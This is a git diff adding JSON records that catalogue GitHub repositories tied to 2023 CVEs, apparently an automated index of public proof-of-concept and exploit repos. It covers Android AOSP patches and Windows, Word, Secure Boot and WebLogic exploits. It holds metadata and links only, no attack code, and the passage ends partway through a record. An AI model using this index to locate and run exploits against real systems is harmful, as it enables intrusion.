diff --git a/2023/CVE-2023-21144.json b/2023/CVE-2023-21144.json
new file mode 100644
index 0000000000..9bd466d621
--- /dev/null
+++ b/2023/CVE-2023-21144.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 730517826,
+ "name": "Framework_base_AOSP10_r33_CVE-2023-21144_old",
+ "full_name": "hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144_old",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144_old",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-12T05:14:32Z",
+ "updated_at": "2024-02-28T07:12:02Z",
+ "pushed_at": "2023-12-12T05:15:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730528882,
+ "name": "Framework_base_AOSP10_r33_CVE-2023-21144",
+ "full_name": "hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-12T05:54:11Z",
+ "updated_at": "2024-02-28T07:12:29Z",
+ "pushed_at": "2023-12-12T06:00:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21238.json b/2023/CVE-2023-21238.json
new file mode 100644
index 0000000000..d8eb849685
--- /dev/null
+++ b/2023/CVE-2023-21238.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 702861024,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21238",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21238",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21238",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-10T06:46:00Z",
+ "updated_at": "2023-10-10T06:57:51Z",
+ "pushed_at": "2023-10-10T06:56:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21246.json b/2023/CVE-2023-21246.json
new file mode 100644
index 0000000000..edf4c96021
--- /dev/null
+++ b/2023/CVE-2023-21246.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 702369565,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21246",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21246",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21246",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-09T07:33:24Z",
+ "updated_at": "2023-10-09T07:39:52Z",
+ "pushed_at": "2023-10-09T11:49:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21251.json b/2023/CVE-2023-21251.json
new file mode 100644
index 0000000000..b3761f1edb
--- /dev/null
+++ b/2023/CVE-2023-21251.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703923876,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21251",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21251",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21251",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-12T07:30:13Z",
+ "updated_at": "2023-10-12T07:35:27Z",
+ "pushed_at": "2023-10-12T07:34:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21272.json b/2023/CVE-2023-21272.json
new file mode 100644
index 0000000000..22eb11f034
--- /dev/null
+++ b/2023/CVE-2023-21272.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 696732075,
+ "name": "frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272",
+ "full_name": "Trinadh465\/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-26T10:28:51Z",
+ "updated_at": "2023-09-26T10:36:04Z",
+ "pushed_at": "2023-09-26T10:36:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 700750193,
+ "name": "platform_frameworks_base_AOSP_10_r33_CVE-2023-21272",
+ "full_name": "pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-05T08:13:35Z",
+ "updated_at": "2023-10-05T08:21:14Z",
+ "pushed_at": "2023-10-05T08:20:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21275.json b/2023/CVE-2023-21275.json
new file mode 100644
index 0000000000..c9f97c5322
--- /dev/null
+++ b/2023/CVE-2023-21275.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700806018,
+ "name": "packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275",
+ "full_name": "Trinadh465\/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-05T10:30:41Z",
+ "updated_at": "2023-10-05T10:32:25Z",
+ "pushed_at": "2023-10-05T10:32:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21281.json b/2023/CVE-2023-21281.json
new file mode 100644
index 0000000000..b615246da4
--- /dev/null
+++ b/2023/CVE-2023-21281.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 699780067,
+ "name": "platform_frameworks_base_CVE-2023-21281",
+ "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21281",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21281",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-03T10:23:48Z",
+ "updated_at": "2023-10-03T10:32:15Z",
+ "pushed_at": "2023-10-03T10:31:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21282.json b/2023/CVE-2023-21282.json
new file mode 100644
index 0000000000..3a01d90450
--- /dev/null
+++ b/2023/CVE-2023-21282.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 700249234,
+ "name": "external_aac_AOSP10_r33_CVE-2023-21282",
+ "full_name": "Trinadh465\/external_aac_AOSP10_r33_CVE-2023-21282",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_aac_AOSP10_r33_CVE-2023-21282",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-04T08:31:10Z",
+ "updated_at": "2023-10-04T08:33:06Z",
+ "pushed_at": "2023-10-04T08:33:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 774784509,
+ "name": "external_aac_android-4.2.2_r1_CVE-2023-21282",
+ "full_name": "Trinadh465\/external_aac_android-4.2.2_r1_CVE-2023-21282",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_aac_android-4.2.2_r1_CVE-2023-21282",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-20T07:15:49Z",
+ "updated_at": "2024-03-20T07:18:33Z",
+ "pushed_at": "2024-03-20T07:18:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21284.json b/2023/CVE-2023-21284.json
new file mode 100644
index 0000000000..562bd784e5
--- /dev/null
+++ b/2023/CVE-2023-21284.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700773248,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21284",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21284",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21284",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-05T09:10:47Z",
+ "updated_at": "2023-10-05T09:22:59Z",
+ "pushed_at": "2023-10-05T09:22:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21285.json b/2023/CVE-2023-21285.json
new file mode 100644
index 0000000000..0b66b135c0
--- /dev/null
+++ b/2023/CVE-2023-21285.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 728564763,
+ "name": "framework_base_CVE-2023-21285_NoPatch",
+ "full_name": "uthrasri\/framework_base_CVE-2023-21285_NoPatch",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/framework_base_CVE-2023-21285_NoPatch",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-07T08:03:03Z",
+ "updated_at": "2023-12-11T18:17:37Z",
+ "pushed_at": "2023-12-07T09:13:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800354647,
+ "name": "frameworks_base_AOSP10_r33_CVE-2023-21285",
+ "full_name": "krnidhi\/frameworks_base_AOSP10_r33_CVE-2023-21285",
+ "owner": {
+ "login": "krnidhi",
+ "id": 168801672,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168801672?v=4",
+ "html_url": "https:\/\/github.com\/krnidhi"
+ },
+ "html_url": "https:\/\/github.com\/krnidhi\/frameworks_base_AOSP10_r33_CVE-2023-21285",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-14T07:12:19Z",
+ "updated_at": "2024-05-14T07:36:23Z",
+ "pushed_at": "2024-05-14T07:36:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21286.json b/2023/CVE-2023-21286.json
new file mode 100644
index 0000000000..e2a3455e92
--- /dev/null
+++ b/2023/CVE-2023-21286.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 699793027,
+ "name": "platform_frameworks_base_CVE-2023-21286",
+ "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21286",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21286",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-03T10:58:51Z",
+ "updated_at": "2023-10-03T11:06:54Z",
+ "pushed_at": "2023-10-03T11:06:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21288.json b/2023/CVE-2023-21288.json
new file mode 100644
index 0000000000..915d2654d3
--- /dev/null
+++ b/2023/CVE-2023-21288.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700206219,
+ "name": "platform_frameworks_base_CVE-2023-21288",
+ "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21288",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21288",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-04T06:42:19Z",
+ "updated_at": "2023-10-04T06:48:34Z",
+ "pushed_at": "2023-10-04T07:10:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21554.json b/2023/CVE-2023-21554.json
new file mode 100644
index 0000000000..018f7fe5a6
--- /dev/null
+++ b/2023/CVE-2023-21554.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 679812800,
+ "name": "CVE-2023-21554",
+ "full_name": "3tternp\/CVE-2023-21554",
+ "owner": {
+ "login": "3tternp",
+ "id": 26215963,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26215963?v=4",
+ "html_url": "https:\/\/github.com\/3tternp"
+ },
+ "html_url": "https:\/\/github.com\/3tternp\/CVE-2023-21554",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-17T17:16:46Z",
+ "updated_at": "2024-06-18T13:16:26Z",
+ "pushed_at": "2023-08-21T21:22:40Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21560.json b/2023/CVE-2023-21560.json
new file mode 100644
index 0000000000..982bbf9ae0
--- /dev/null
+++ b/2023/CVE-2023-21560.json
@@ -0,0 +1,43 @@
+[
+ {
+ "id": 811928581,
+ "name": "dubiousdisk",
+ "full_name": "Wack0\/dubiousdisk",
+ "owner": {
+ "login": "Wack0",
+ "id": 2650838,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4",
+ "html_url": "https:\/\/github.com\/Wack0"
+ },
+ "html_url": "https:\/\/github.com\/Wack0\/dubiousdisk",
+ "description": "The Porygon-Z that's super effective against Secure Boot! (CVE-2022-30203, CVE-2023-21560, CVE-2023-28269, CVE-2023-28249, and more...)",
+ "fork": false,
+ "created_at": "2024-06-07T15:25:33Z",
+ "updated_at": "2024-06-21T17:03:02Z",
+ "pushed_at": "2024-06-07T15:26:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bitlocker",
+ "cve-2022-30203",
+ "cve-2023-21560",
+ "cve-2023-28249",
+ "cve-2023-28269",
+ "secure-boot",
+ "uefi",
+ "vulnerability",
+ "windows-boot",
+ "writeup"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21674.json b/2023/CVE-2023-21674.json
new file mode 100644
index 0000000000..60ae7d9666
--- /dev/null
+++ b/2023/CVE-2023-21674.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 768456651,
+ "name": "CVE-2023-21674",
+ "full_name": "hd3s5aa\/CVE-2023-21674",
+ "owner": {
+ "login": "hd3s5aa",
+ "id": 160862061,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160862061?v=4",
+ "html_url": "https:\/\/github.com\/hd3s5aa"
+ },
+ "html_url": "https:\/\/github.com\/hd3s5aa\/CVE-2023-21674",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-07T05:43:48Z",
+ "updated_at": "2024-06-21T00:12:09Z",
+ "pushed_at": "2024-04-05T00:05:44Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21716.json b/2023/CVE-2023-21716.json
new file mode 100644
index 0000000000..0e8e13f7cc
--- /dev/null
+++ b/2023/CVE-2023-21716.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 714215346,
+ "name": "CVE-2023-21716-EXPLOIT.py",
+ "full_name": "MojithaR\/CVE-2023-21716-EXPLOIT.py",
+ "owner": {
+ "login": "MojithaR",
+ "id": 127576267,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4",
+ "html_url": "https:\/\/github.com\/MojithaR"
+ },
+ "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-21716-EXPLOIT.py",
+ "description": "This is an exploit file which is used to check CVE-2021-21716 vulnerability",
+ "fork": false,
+ "created_at": "2023-11-04T08:49:14Z",
+ "updated_at": "2024-06-23T14:56:12Z",
+ "pushed_at": "2023-11-05T12:23:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21746.json b/2023/CVE-2023-21746.json
new file mode 100644
index 0000000000..2163b3a08f
--- /dev/null
+++ b/2023/CVE-2023-21746.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 667091173,
+ "name": "LocalPotato_CVE-2023-21746",
+ "full_name": "Muhammad-Ali007\/LocalPotato_CVE-2023-21746",
+ "owner": {
+ "login": "Muhammad-Ali007",
+ "id": 64638296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4",
+ "html_url": "https:\/\/github.com\/Muhammad-Ali007"
+ },
+ "html_url": "https:\/\/github.com\/Muhammad-Ali007\/LocalPotato_CVE-2023-21746",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-16T15:57:37Z",
+ "updated_at": "2024-02-24T07:35:51Z",
+ "pushed_at": "2023-07-16T16:05:35Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21752.json b/2023/CVE-2023-21752.json
new file mode 100644
index 0000000000..b1137b9753
--- /dev/null
+++ b/2023/CVE-2023-21752.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 677068156,
+ "name": "CVE-2023-21752",
+ "full_name": "yosef0x01\/CVE-2023-21752",
+ "owner": {
+ "login": "yosef0x01",
+ "id": 96077889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4",
+ "html_url": "https:\/\/github.com\/yosef0x01"
+ },
+ "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-21752",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-10T16:55:06Z",
+ "updated_at": "2023-08-10T16:55:07Z",
+ "pushed_at": "2023-08-23T04:07:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21768.json b/2023/CVE-2023-21768.json
new file mode 100644
index 0000000000..b2e8bb8ebc
--- /dev/null
+++ b/2023/CVE-2023-21768.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 699311026,
+ "name": "Recreate-cve-2023-21768",
+ "full_name": "Rosayxy\/Recreate-cve-2023-21768",
+ "owner": {
+ "login": "Rosayxy",
+ "id": 130039321,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130039321?v=4",
+ "html_url": "https:\/\/github.com\/Rosayxy"
+ },
+ "html_url": "https:\/\/github.com\/Rosayxy\/Recreate-cve-2023-21768",
+ "description": "recreating exp for cve-2023-21768.",
+ "fork": false,
+ "created_at": "2023-10-02T11:36:49Z",
+ "updated_at": "2023-10-02T13:58:53Z",
+ "pushed_at": "2023-10-02T12:06:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 783126137,
+ "name": "CVE-2023-21768",
+ "full_name": "Ha0-Y\/CVE-2023-21768",
+ "owner": {
+ "login": "Ha0-Y",
+ "id": 102413682,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102413682?v=4",
+ "html_url": "https:\/\/github.com\/Ha0-Y"
+ },
+ "html_url": "https:\/\/github.com\/Ha0-Y\/CVE-2023-21768",
+ "description": "CVE-2023-21768 Proof of Concept",
+ "fork": false,
+ "created_at": "2024-04-07T02:26:36Z",
+ "updated_at": "2024-04-07T02:53:21Z",
+ "pushed_at": "2024-04-07T02:53:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 801154640,
+ "name": "CVE-2023-21768-dotnet",
+ "full_name": "xboxoneresearch\/CVE-2023-21768-dotnet",
+ "owner": {
+ "login": "xboxoneresearch",
+ "id": 43215579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43215579?v=4",
+ "html_url": "https:\/\/github.com\/xboxoneresearch"
+ },
+ "html_url": "https:\/\/github.com\/xboxoneresearch\/CVE-2023-21768-dotnet",
+ "description": "C# \/ .NET version of CVE-2023-21768",
+ "fork": false,
+ "created_at": "2024-05-15T17:42:10Z",
+ "updated_at": "2024-06-21T05:58:50Z",
+ "pushed_at": "2024-05-18T05:22:16Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21839.json b/2023/CVE-2023-21839.json
new file mode 100644
index 0000000000..0c7727bc95
--- /dev/null
+++ b/2023/CVE-2023-21839.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 708781903,
+ "name": "weblogic_CVE-2023-21839_POC-EXP",
+ "full_name": "MMarch7\/weblogic_CVE-2023-21839_POC-EXP",
+ "owner": {
+ "login": "MMarch7",
+ "id": 148614285,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148614285?v=4",
+ "html_url": "https:\/\/github.com\/MMarch7"
+ },
